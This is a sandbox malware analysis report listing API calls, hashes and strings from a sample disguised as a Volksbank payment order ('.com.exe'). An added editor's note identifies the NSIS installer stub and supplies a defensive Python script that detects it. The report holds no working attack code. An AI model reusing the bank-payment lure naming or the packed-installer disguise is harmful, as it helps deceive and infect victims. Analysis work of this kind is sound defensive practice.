• Snapshot File: hcaresult_0_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: FileWrite
• String ID:
• API String ID: 3934441357-0
• Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
• Instruction ID: c8204e3b8f5822b3fc4a752f4075b10d4d5d267c9e9767057f3313d1a75d1f26
• Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
• Instruction Fuzzy Hash: 38E0E632510559ABDF116F55DC00AEB775CFB05360F004436FD55E7150D671E9219BE4
APIs
• VirtualProtect.KERNELBASE(1000405C,?,?,1000404C), ref: 100027E0
Memory Dump Source
• Source File: 00000000.00000002.2958030354.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.2957996805.0000000010000000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000000.00000002.2958065115.0000000010003000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000000.00000002.2958090906.0000000010005000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_10000000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: ProtectVirtual
• String ID:
• API String ID: 544645111-0
• Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
• Instruction ID: 43a77b614ff4017466e57d7f63f0e44ab05d53355a3bca00642047650885b550
• Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
• Instruction Fuzzy Hash: C5F0A5F15057A0DEF350DF688C847063BE4E3583C4B03852AE368F6269EB344454DF19
APIs
• RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,007A0F00,?,?,0040615A,007A0F00,00000000,?,?,Call,?), ref: 004060F0
Memory Dump Source
• Source File: 00000000.00000002.2948860439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Open
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 71445658-0
                                                                                                                                                                                                                                          • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                                                                                                                                                                                          • Instruction ID: ced63528db1e32a5bcf3a8a8acf2bd7baad3650648e26365f6afbd74657f9209
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BED0123208020DBBDF219F909D01FAB375DAB04354F018436FE06E4190DB76D570AB14
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404252
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2948860439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948827059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948892668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2949501994.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: MessageSend
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3850602802-0
                                                                                                                                                                                                                                          • Opcode ID: cb0b7ebd38eb4799b8f4196fcc58e5a20f32a56ef1c2a101366cf6dcdfe2cd36
                                                                                                                                                                                                                                          • Instruction ID: 05de0a4d5a0d3ad16659c86bea74b86f68b6b4ad9b47f793b7e3caf381fa8301
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cb0b7ebd38eb4799b8f4196fcc58e5a20f32a56ef1c2a101366cf6dcdfe2cd36
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 10C09BB17843017BDE109B509D49F0777585BE0741F15857D7350F50E0C674E450D61D
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • SetFilePointer.KERNELBASE(?,00000000,00000000,00403088,?,?,00000006,?,0000000A), ref: 00403316
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2948860439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948827059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948892668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2949501994.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FilePointer
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 973152223-0
                                                                                                                                                                                                                                          • Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                                                                                                                                                                                          • Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,?,00000001,00404054), ref: 00404237
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2948860439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948827059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948892668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2949501994.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: MessageSend
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3850602802-0
• Opcode ID: f360a53124e97c409135d1b53ccadec94ff58fec8389da7a5f3de8c8d06ef766
• Instruction ID: 5dee82f2d739acac93035fb571c052082ac1606baee7bb158d490297d0aa81d3
• Opcode Fuzzy Hash: f360a53124e97c409135d1b53ccadec94ff58fec8389da7a5f3de8c8d06ef766
• Instruction Fuzzy Hash: 99B09236190A00AADE614B40DE49F457A62A7A8701F00C029B240640B0CAB200A0DB09
APIs
• KiUserCallbackDispatcher.NTDLL(?,00403FED), ref: 00404220
Memory Dump Source
• Source File: 00000000.00000002.2948860439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: CallbackDispatcherUser
• String ID:
• API String ID: 2492992576-0
• Opcode ID: efc6552eadcfffb9f020cd3683497eb6feb0237cfd1954b00ec8dcd11a4bd103
• Instruction ID: 2198674f4dd135e02f2a8ae7056ebba5a8e761495b22eeaea90ee2a366c7106d
• Opcode Fuzzy Hash: efc6552eadcfffb9f020cd3683497eb6feb0237cfd1954b00ec8dcd11a4bd103
• Instruction Fuzzy Hash: 0AA002754455409FDF015B50EF048057A61B7E5741B61C469A25551074C7354461EB19
APIs
  • Part of subcall function 1000121B: GlobalAlloc.KERNEL32(?,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
• GlobalAlloc.KERNEL32(?,00001CA4), ref: 10001C24
• lstrcpyW.KERNEL32(00000008,?), ref: 10001C6C
• lstrcpyW.KERNEL32(00000808,?), ref: 10001C76
• GlobalFree.KERNEL32(00000000), ref: 10001C89
• GlobalFree.KERNEL32(?), ref: 10001D83
• GlobalFree.KERNEL32(?), ref: 10001D88
• GlobalFree.KERNEL32(?), ref: 10001D8D
• GlobalFree.KERNEL32(00000000), ref: 10001F38
• lstrcpyW.KERNEL32(?,?), ref: 1000209C
Memory Dump Source
• Source File: 00000000.00000002.2958030354.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.2957996805.0000000010000000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000000.00000002.2958065115.0000000010003000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000000.00000002.2958090906.0000000010005000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_10000000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: Global$Free$lstrcpy$Alloc
• String ID:
• API String ID: 4227406936-0
• Opcode ID: 5a24c136153c29b9d98a91a4f463aeb2504b823c6cdae7135cdbbdb8769d9cc1
• Instruction ID: 952ca616c20dc2fa21031af5d26a5f3ec91fa4f9dea92b18a1e2b318678e368b
• Opcode Fuzzy Hash: 5a24c136153c29b9d98a91a4f463aeb2504b823c6cdae7135cdbbdb8769d9cc1
• Instruction Fuzzy Hash: 10129C75D0064AEFEB20CFA4C8806EEB7F4FB083D4F61452AE565E7198D774AA80DB50
APIs
• CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406046,00000000,00000000), ref: 00405EE6
• GetShortPathNameW.KERNEL32(?,007A55C0,00000400), ref: 00405EEF
  • Part of subcall function 00405CB6: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F9F,00000000,[Rename],00000000,00000000,00000000), ref: 00405CC6
  • Part of subcall function 00405CB6: lstrlenA.KERNEL32(00000000,?,00000000,00405F9F,00000000,[Rename],00000000,00000000,00000000), ref: 00405CF8
• GetShortPathNameW.KERNEL32(?,007A5DC0,00000400), ref: 00405F0C
• wsprintfA.USER32 ref: 00405F2A
• GetFileSize.KERNEL32(00000000,00000000,007A5DC0,C0000000,?,007A5DC0,?), ref: 00405F65
• GlobalAlloc.KERNEL32(?,0000000A), ref: 00405F74
• lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405FAC
• SetFilePointer.KERNEL32(0040A560,00000000,00000000,00000000,00000000,007A51C0,00000000,-0000000A,0040A560,00000000,[Rename],00000000,00000000,00000000), ref: 00406002
• GlobalFree.KERNEL32(00000000), ref: 00406013
• CloseHandle.KERNEL32(00000000), ref: 0040601A
  • Part of subcall function 00405D51: GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe,80000000,00000003,?,00000006,?,0000000A), ref: 00405D55
  • Part of subcall function 00405D51: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,?,0000000A), ref: 00405D77
Strings
Memory Dump Source
• Source File: 00000000.00000002.2948860439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
• String ID: %ls=%ls$[Rename]
• API String ID: 2171350718-461813615
• Opcode ID: 9234885be5e57950de04a4ffe204c7f94bcd269eedac1ba9c5005a2d30df1b06
• Instruction ID: 89c32d2153287748ec41ed641a28e9b16702ce233dbd70bd77460b6709aa78c6
• Opcode Fuzzy Hash: 9234885be5e57950de04a4ffe204c7f94bcd269eedac1ba9c5005a2d30df1b06
• Instruction Fuzzy Hash: F8312871601B05BBD220AB619D48F6B3A9CEF85744F14003EFA42F62D2DA7CD8118ABD
APIs
• CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe",0040332B,C:\Users\user\AppData\Local\Temp\,76943420,0040359C,?,00000006,?,0000000A), ref: 00406556
• CharNextW.USER32(?,?,?,00000000,?,00000006,?,0000000A), ref: 00406565
• CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe",0040332B,C:\Users\user\AppData\Local\Temp\,76943420,0040359C,?,00000006,?,0000000A), ref: 0040656A
• CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe",0040332B,C:\Users\user\AppData\Local\Temp\,76943420,0040359C,?,00000006,?,0000000A), ref: 0040657D
Strings
• *?|<>/":, xrefs: 00406545
• C:\Users\user\AppData\Local\Temp\, xrefs: 004064F4, 004064F9
• "C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe", xrefs: 004064F3
Memory Dump Source
• Source File: 00000000.00000002.2948860439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2948827059.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948892668.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2949501994.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Char$Next$Prev
                                                                                                                                                                                                                                          • String ID: "C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                                                          • API String ID: 589700163-3387442124
                                                                                                                                                                                                                                          • Opcode ID: dac06de1e1615827748cce9690c43cbd9586789469f0d882438918906e4257c7
                                                                                                                                                                                                                                          • Instruction ID: b8c3cbf5b75eb2b2499c9cde9ef872d51aef5c2750dc7b0313243111e00abff4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dac06de1e1615827748cce9690c43cbd9586789469f0d882438918906e4257c7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9B11C85580021275DB303B14BC40ABBA6F8EF59754F52403FE985732C8E77C5C9286BD
APIs
• GetWindowLongW.USER32(?,000000EB), ref: 00404278
• GetSysColor.USER32(00000000), ref: 00404294
• SetTextColor.GDI32(?,00000000), ref: 004042A0
• SetBkMode.GDI32(?,?), ref: 004042AC
• GetSysColor.USER32(?), ref: 004042BF
• SetBkColor.GDI32(?,?), ref: 004042CF
• DeleteObject.GDI32(?), ref: 004042E9
• CreateBrushIndirect.GDI32(?), ref: 004042F3
Memory Dump Source
• Source File: 00000000.00000002.2948860439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2948827059.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948892668.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.000000000077C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.0000000000782000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.0000000000786000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.0000000000789000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.00000000007AD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.00000000007CA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.00000000007DF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2949501994.00000000007E3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
• String ID:
• API String ID: 2320649405-0
• Opcode ID: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
• Instruction ID: 89996262c0d64ac0fda19422125f93b67266a0f1ca122a9c1e6306c3a20023a3
• Opcode Fuzzy Hash: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
• Instruction Fuzzy Hash: 34219271500704ABCB209F68DE08B4BBBF8AF41714B048A6DFD92A22A0C734D904CB54
APIs
• SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DF5
• MulDiv.KERNEL32(000CACE6,?,000CACEA), ref: 00402E20
• wsprintfW.USER32 ref: 00402E30
• SetWindowTextW.USER32(?,?), ref: 00402E40
• SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E52
Strings
• verifying installer: %d%%, xrefs: 00402E2A
Memory Dump Source
• Source File: 00000000.00000002.2948860439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2948827059.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948892668.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.000000000077C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.0000000000782000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.0000000000786000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.0000000000789000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.00000000007AD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.00000000007CA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.00000000007DF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2949501994.00000000007E3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: Text$ItemTimerWindowwsprintf
• String ID: verifying installer: %d%%
• API String ID: 1451636040-82062127
• Opcode ID: dbbbfae8d01556434cd8b9f8079c14b742463200277d1f2e5f02c0c8f6c1ad5d
• Instruction ID: c563a075df83d92fb310a5016e42997ab7e5782e6b78b1479044c0af3efb3f55
• Opcode Fuzzy Hash: dbbbfae8d01556434cd8b9f8079c14b742463200277d1f2e5f02c0c8f6c1ad5d
• Instruction Fuzzy Hash: DE01677064020CBFDF149F50DD49FAA3B68AB00304F108039FA06F51D0DBB98965CF59
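Editor's note, added to the report: two of the function listings above carry strings that identify the outer executable's stub rather than the payload. The character set *?|<>/": walked with CharNextW/CharPrevW (xref 00406545) is the filename blacklist of the NSIS installer stub (exehead), and the "verifying installer: %d%%" caption refreshed from a SetTimer callback through MulDiv, wsprintfW and SetDlgItemTextW on control 0x406 is its CRC-check progress dialog. That identification is the editor's, not the report's. The script below is an added triage helper, not code from the report, from Joe Sandbox or from NSIS: it scans a file for those two strings in the UTF-16LE form a W-API build carries and in the ASCII form an ANSI build would use, and for the NSIS first-header marker (0xDEADBEEF followed by "NullsoftInst") as confirmation before an analyst tries to extract the script and payload with 7-Zip. All function, class and field names in it are the editor's.

```python
"""Added triage helper (not part of the Joe Sandbox report): find the installer-stub
strings recorded in the function listings and give a coarse packer verdict."""
from __future__ import annotations

import sys
from dataclasses import dataclass

# Strings copied from the function listings in the report.
STUB_STRINGS = {
    "filename_blacklist": '*?|<>/":',                 # listed at xref 00406545
    "crc_check_caption": "verifying installer: %d%%",  # listed at xref 00402E2A
}
# NSIS first-header marker: the signature dword 0xDEADBEEF (little-endian on disk)
# followed by the literal "NullsoftInst". Editor's addition, not from the report.
NSIS_MARKER = bytes.fromhex("EFBEADDE") + b"NullsoftInst"


@dataclass(frozen=True)
class Hit:
    name: str       # key from STUB_STRINGS
    encoding: str   # "utf-16-le" for a Unicode (W-API) build, "ascii" for an ANSI build
    offset: int     # byte offset in the scanned file


def _find_all(data: bytes, needle: bytes) -> list[int]:
    """Every byte offset of needle in data, overlapping matches included."""
    found, start = [], 0
    while (i := data.find(needle, start)) >= 0:
        found.append(i)
        start = i + 1
    return found


def find_stub_strings(data: bytes) -> list[Hit]:
    """All occurrences of the stub strings in either encoding, sorted by offset."""
    hits = []
    for name, text in STUB_STRINGS.items():
        for enc in ("utf-16-le", "ascii"):
            for off in _find_all(data, text.encode(enc)):
                hits.append(Hit(name, enc, off))
    return sorted(hits, key=lambda h: h.offset)


def classify(data: bytes) -> str:
    """Verdict: 'none' (no string), 'partial' (one of the two strings),
    'nsis-strings' (both strings) or 'nsis-installer' (both strings plus the
    first-header marker). A single string alone is not treated as conclusive."""
    names = {h.name for h in find_stub_strings(data)}
    if not names:
        return "none"
    if names != set(STUB_STRINGS):
        return "partial"
    return "nsis-installer" if NSIS_MARKER in data else "nsis-strings"


def main(path: str) -> None:
    with open(path, "rb") as fh:
        data = fh.read()
    for h in find_stub_strings(data):
        print(f"{h.offset:#010x}  {h.encoding:<9}  {h.name}")
    print("verdict:", classify(data))


if __name__ == "__main__":
    main(sys.argv[1])
```

Run it as `python nsis_stub_triage.py sample.exe`; a verdict of nsis-installer means the file is an NSIS package whose script and embedded files can be listed with 7-Zip, and the listings above then describe the stub, so analysis time is better spent on the extracted contents than on these routines.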
APIs
